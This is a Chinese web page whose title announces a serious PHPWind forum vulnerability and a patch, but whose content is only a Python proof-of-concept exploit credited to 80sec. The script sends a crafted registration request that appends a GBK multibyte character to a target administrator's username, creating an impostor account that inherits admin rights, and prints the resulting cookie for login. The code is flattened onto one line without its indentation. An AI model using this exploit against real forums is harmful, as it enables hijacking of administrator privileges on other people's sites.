PHPWind惊暴严重安全漏洞 官方补丁下载

[code]# -*- coding: gb2312 -*-import urllib2,httplib,syshttplib.HTTPConnection.debuglevel = 1cookies = urllib2.HTTPCookieProcessor()opener = urllib2.build_opener(cookies)def banner():    print ""    print "########################################################"    print "Phpwind所有版本管理权限泄露漏洞利用poc"    print "Copyright (C) 2006"    print "jianxin@80sec.com"    print "80sec是一个新的致力于web安全的小团体"    print "http://www.80sec.com"def usage():    banner()    print "Usage:/n"    print "   $ ./phpwind.py pwforumurl usertoattack/n"    print "   pwforumurl 目标论坛地址如http://www.80sec.com/"    print "   usertoattack 目标拥有权限的斑竹或管理员"    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"    print "   最新版本可以使用uid登陆"    print "   其他版本可以使用cookie+useragent登陆"    print "########################################################"    print ""argvs=sys.argvusage()data = "regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2" %(argvs[2],"%c1")pwurl = "%s/register.php" % argvs[1]request = urllib2.Request(url     = pwurl ,        headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},        data    = data)f=opener.open(request)headers=f.headers.dictcookie=headers["set-cookie"]try:if cookie.index('winduser'):print "Exploit Success!"print "Login with uid password @80sec or Cookie:"print cookieprint "User-agent: 80sec owned this"except:print "Error! http://www.80sec.com"print "Connect root#80sec.com"[/code]